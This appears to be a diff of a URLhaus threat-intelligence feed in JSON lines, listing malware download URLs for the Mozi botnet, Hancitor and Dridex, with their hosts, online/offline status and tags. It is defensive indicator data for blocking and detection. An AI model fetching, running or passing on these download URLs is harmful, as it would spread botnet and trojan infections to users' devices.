+{"id":"961265","urlhaus_reference":"https://urlhaus.abuse.ch/url/961265/","url":"http://89.160.20.156:43584/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:07:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961264","urlhaus_reference":"https://urlhaus.abuse.ch/url/961264/","url":"http://89.160.20.156:44976/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:06:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961259","urlhaus_reference":"https://urlhaus.abuse.ch/url/961259/","url":"http://89.160.20.156:51107/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961260","urlhaus_reference":"https://urlhaus.abuse.ch/url/961260/","url":"http://89.160.20.156:33790/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961261","urlhaus_reference":"https://urlhaus.abuse.ch/url/961261/","url":"http://89.160.20.156:58919/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961262","urlhaus_reference":"https://urlhaus.abuse.ch/url/961262/","url":"http://89.160.20.156:40395/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961263","urlhaus_reference":"https://urlhaus.abuse.ch/url/961263/","url":"http://89.160.20.156:53510/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961258","urlhaus_reference":"https://urlhaus.abuse.ch/url/961258/","url":"http://89.160.20.156:39115/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961257","urlhaus_reference":"https://urlhaus.abuse.ch/url/961257/","url":"http://89.160.20.156:40713/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961256","urlhaus_reference":"https://urlhaus.abuse.ch/url/961256/","url":"http://89.160.20.156:54811/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961255","urlhaus_reference":"https://urlhaus.abuse.ch/url/961255/","url":"http://89.160.20.156:58269/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961251","urlhaus_reference":"https://urlhaus.abuse.ch/url/961251/","url":"http://89.160.20.156:47985/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961252","urlhaus_reference":"https://urlhaus.abuse.ch/url/961252/","url":"http://89.160.20.156:38107/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961253","urlhaus_reference":"https://urlhaus.abuse.ch/url/961253/","url":"http://89.160.20.156:50354/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961254","urlhaus_reference":"https://urlhaus.abuse.ch/url/961254/","url":"http://89.160.20.156:44987/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961249","urlhaus_reference":"https://urlhaus.abuse.ch/url/961249/","url":"http://89.160.20.156:44681/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961250","urlhaus_reference":"https://urlhaus.abuse.ch/url/961250/","url":"http://89.160.20.156:58391/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961248","urlhaus_reference":"https://urlhaus.abuse.ch/url/961248/","url":"http://89.160.20.156:48540/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961246","urlhaus_reference":"https://urlhaus.abuse.ch/url/961246/","url":"http://89.160.20.156:42755/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961247","urlhaus_reference":"https://urlhaus.abuse.ch/url/961247/","url":"http://89.160.20.156:52688/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961244","urlhaus_reference":"https://urlhaus.abuse.ch/url/961244/","url":"http://89.160.20.156:33782/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961245","urlhaus_reference":"https://urlhaus.abuse.ch/url/961245/","url":"http://89.160.20.156:50381/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961243","urlhaus_reference":"https://urlhaus.abuse.ch/url/961243/","url":"http://89.160.20.156:44219/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961242","urlhaus_reference":"https://urlhaus.abuse.ch/url/961242/","url":"http://89.160.20.156:36619/bin.sh","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:01:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961241","urlhaus_reference":"https://urlhaus.abuse.ch/url/961241/","url":"http://89.160.20.156:59976/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:56:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961239","urlhaus_reference":"https://urlhaus.abuse.ch/url/961239/","url":"http://89.160.20.156:48688/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:51:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961240","urlhaus_reference":"https://urlhaus.abuse.ch/url/961240/","url":"http://89.160.20.156:45682/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:51:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961238","urlhaus_reference":"https://urlhaus.abuse.ch/url/961238/","url":"http://89.160.20.156:34922/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961233","urlhaus_reference":"https://urlhaus.abuse.ch/url/961233/","url":"http://89.160.20.156:37489/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961234","urlhaus_reference":"https://urlhaus.abuse.ch/url/961234/","url":"http://89.160.20.156:51940/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961235","urlhaus_reference":"https://urlhaus.abuse.ch/url/961235/","url":"http://89.160.20.156:49599/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961236","urlhaus_reference":"https://urlhaus.abuse.ch/url/961236/","url":"http://89.160.20.156:53436/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961237","urlhaus_reference":"https://urlhaus.abuse.ch/url/961237/","url":"http://89.160.20.156:57237/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961232","urlhaus_reference":"https://urlhaus.abuse.ch/url/961232/","url":"http://89.160.20.156:50907/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961231","urlhaus_reference":"https://urlhaus.abuse.ch/url/961231/","url":"http://89.160.20.156:41910/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961229","urlhaus_reference":"https://urlhaus.abuse.ch/url/961229/","url":"http://89.160.20.156:57217/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961230","urlhaus_reference":"https://urlhaus.abuse.ch/url/961230/","url":"http://89.160.20.156:47632/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961227","urlhaus_reference":"https://urlhaus.abuse.ch/url/961227/","url":"http://89.160.20.156:46654/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961228","urlhaus_reference":"https://urlhaus.abuse.ch/url/961228/","url":"http://89.160.20.156:59073/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961221","urlhaus_reference":"https://urlhaus.abuse.ch/url/961221/","url":"http://89.160.20.156:37958/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961222","urlhaus_reference":"https://urlhaus.abuse.ch/url/961222/","url":"http://89.160.20.156:53943/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961223","urlhaus_reference":"https://urlhaus.abuse.ch/url/961223/","url":"http://89.160.20.156:40404/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961224","urlhaus_reference":"https://urlhaus.abuse.ch/url/961224/","url":"http://89.160.20.156:46738/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961225","urlhaus_reference":"https://urlhaus.abuse.ch/url/961225/","url":"http://89.160.20.156:58234/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961226","urlhaus_reference":"https://urlhaus.abuse.ch/url/961226/","url":"http://89.160.20.156:36911/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961220","urlhaus_reference":"https://urlhaus.abuse.ch/url/961220/","url":"http://89.160.20.156:35028/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} {"id":"961219","urlhaus_reference":"https://urlhaus.abuse.ch/url/961219/","url":"http://allanabolicsteam.net/nedfr_.exe","url_status":"offline","host":"allanabolicsteam.net","date_added":"2021-01-14 18:47:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"Myrtus0x0","larted":"true","tags":["c2","hancitor","payload"]} {"id":"961217","urlhaus_reference":"https://urlhaus.abuse.ch/url/961217/","url":"https://intranetstc.micromart.com.br/fined.php","url_status":"offline","host":"intranetstc.micromart.com.br","date_added":"2021-01-14 18:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"0x49736b","larted":"false","tags":["Dridex"]} {"id":"961218","urlhaus_reference":"https://urlhaus.abuse.ch/url/961218/","url":"http://allanabolicsteam.net/1301s.bin","url_status":"online","host":"allanabolicsteam.net","date_added":"2021-01-14 18:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"Myrtus0x0","larted":"true","tags":["c2","hancitor","payload"]} -{"id":"961216","urlhaus_reference":"https://urlhaus.abuse.ch/url/961216/","url":"http://61.53.222.100:43741/i","url_status":"online","host":"61.53.222.100","date_added":"2021-01-14 18:44:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961215","urlhaus_reference":"https://urlhaus.abuse.ch/url/961215/","url":"http://42.225.52.44:45803/bin.sh","url_status":"offline","host":"42.225.52.44","date_added":"2021-01-14 18:41:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"false","tags":["32-bit","elf","mips"]} -{"id":"961214","urlhaus_reference":"https://urlhaus.abuse.ch/url/961214/","url":"http://191.242.38.33:38611/Mozi.m","url_status":"offline","host":"191.242.38.33","date_added":"2021-01-14 18:36:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} -{"id":"961213","urlhaus_reference":"https://urlhaus.abuse.ch/url/961213/","url":"http://59.97.171.225:35185/Mozi.m","url_status":"offline","host":"59.97.171.225","date_added":"2021-01-14 18:36:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961212","urlhaus_reference":"https://urlhaus.abuse.ch/url/961212/","url":"http://189.51.102.115:35054/Mozi.m","url_status":"offline","host":"189.51.102.115","date_added":"2021-01-14 18:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961207","urlhaus_reference":"https://urlhaus.abuse.ch/url/961207/","url":"http://42.235.186.115:60038/Mozi.m","url_status":"online","host":"42.235.186.115","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961208","urlhaus_reference":"https://urlhaus.abuse.ch/url/961208/","url":"http://219.157.134.199:52253/Mozi.m","url_status":"online","host":"219.157.134.199","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961209","urlhaus_reference":"https://urlhaus.abuse.ch/url/961209/","url":"http://221.14.21.135:43125/Mozi.m","url_status":"online","host":"221.14.21.135","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961210","urlhaus_reference":"https://urlhaus.abuse.ch/url/961210/","url":"http://58.248.118.230:52650/Mozi.a","url_status":"online","host":"58.248.118.230","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961211","urlhaus_reference":"https://urlhaus.abuse.ch/url/961211/","url":"http://219.155.30.125:59273/Mozi.m","url_status":"online","host":"219.155.30.125","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961206","urlhaus_reference":"https://urlhaus.abuse.ch/url/961206/","url":"http://121.159.74.78:40346/Mozi.m","url_status":"online","host":"121.159.74.78","date_added":"2021-01-14 18:35:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961204","urlhaus_reference":"https://urlhaus.abuse.ch/url/961204/","url":"http://179.227.77.63:44242/Mozi.m","url_status":"offline","host":"179.227.77.63","date_added":"2021-01-14 18:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961205","urlhaus_reference":"https://urlhaus.abuse.ch/url/961205/","url":"http://117.194.167.179:40624/Mozi.m","url_status":"offline","host":"117.194.167.179","date_added":"2021-01-14 18:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961202","urlhaus_reference":"https://urlhaus.abuse.ch/url/961202/","url":"http://123.9.103.67:41245/Mozi.m","url_status":"online","host":"123.9.103.67","date_added":"2021-01-14 18:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961203","urlhaus_reference":"https://urlhaus.abuse.ch/url/961203/","url":"http://182.116.67.218:48866/Mozi.m","url_status":"online","host":"182.116.67.218","date_added":"2021-01-14 18:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961198","urlhaus_reference":"https://urlhaus.abuse.ch/url/961198/","url":"http://125.41.142.109:58258/Mozi.m","url_status":"online","host":"125.41.142.109","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961199","urlhaus_reference":"https://urlhaus.abuse.ch/url/961199/","url":"http://123.9.243.249:34516/Mozi.m","url_status":"online","host":"123.9.243.249","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961200","urlhaus_reference":"https://urlhaus.abuse.ch/url/961200/","url":"http://120.85.171.199:47851/Mozi.m","url_status":"online","host":"120.85.171.199","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961201","urlhaus_reference":"https://urlhaus.abuse.ch/url/961201/","url":"http://186.33.122.79:49226/Mozi.m","url_status":"online","host":"186.33.122.79","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961197","urlhaus_reference":"https://urlhaus.abuse.ch/url/961197/","url":"http://103.97.139.251:36957/bin.sh","url_status":"online","host":"103.97.139.251","date_added":"2021-01-14 18:34:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961196","urlhaus_reference":"https://urlhaus.abuse.ch/url/961196/","url":"http://115.54.114.20:53089/Mozi.m","url_status":"online","host":"115.54.114.20","date_added":"2021-01-14 18:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961193","urlhaus_reference":"https://urlhaus.abuse.ch/url/961193/","url":"http://103.161.49.76:57114/Mozi.m","url_status":"online","host":"103.161.49.76","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961194","urlhaus_reference":"https://urlhaus.abuse.ch/url/961194/","url":"http://115.56.159.83:33163/Mozi.a","url_status":"online","host":"115.56.159.83","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961195","urlhaus_reference":"https://urlhaus.abuse.ch/url/961195/","url":"http://115.56.181.246:48557/Mozi.m","url_status":"online","host":"115.56.181.246","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961192","urlhaus_reference":"https://urlhaus.abuse.ch/url/961192/","url":"http://115.58.166.75:59976/bin.sh","url_status":"online","host":"115.58.166.75","date_added":"2021-01-14 18:31:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961191","urlhaus_reference":"https://urlhaus.abuse.ch/url/961191/","url":"http://125.44.61.35:48291/i","url_status":"online","host":"125.44.61.35","date_added":"2021-01-14 18:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961190","urlhaus_reference":"https://urlhaus.abuse.ch/url/961190/","url":"http://42.230.84.239:45797/Mozi.m","url_status":"online","host":"42.230.84.239","date_added":"2021-01-14 18:21:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961186","urlhaus_reference":"https://urlhaus.abuse.ch/url/961186/","url":"http://61.53.222.100:43741/bin.sh","url_status":"online","host":"61.53.222.100","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961187","urlhaus_reference":"https://urlhaus.abuse.ch/url/961187/","url":"http://59.93.21.58:35446/Mozi.a","url_status":"offline","host":"59.93.21.58","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961188","urlhaus_reference":"https://urlhaus.abuse.ch/url/961188/","url":"http://59.88.231.198:35720/Mozi.m","url_status":"online","host":"59.88.231.198","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961189","urlhaus_reference":"https://urlhaus.abuse.ch/url/961189/","url":"http://59.96.37.115:50501/Mozi.m","url_status":"offline","host":"59.96.37.115","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961185","urlhaus_reference":"https://urlhaus.abuse.ch/url/961185/","url":"http://119.118.75.183:55796/Mozi.m","url_status":"online","host":"119.118.75.183","date_added":"2021-01-14 18:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961183","urlhaus_reference":"https://urlhaus.abuse.ch/url/961183/","url":"http://175.206.182.103:52308/Mozi.m","url_status":"online","host":"175.206.182.103","date_added":"2021-01-14 18:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961184","urlhaus_reference":"https://urlhaus.abuse.ch/url/961184/","url":"http://117.222.162.104:59154/Mozi.m","url_status":"offline","host":"117.222.162.104","date_added":"2021-01-14 18:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 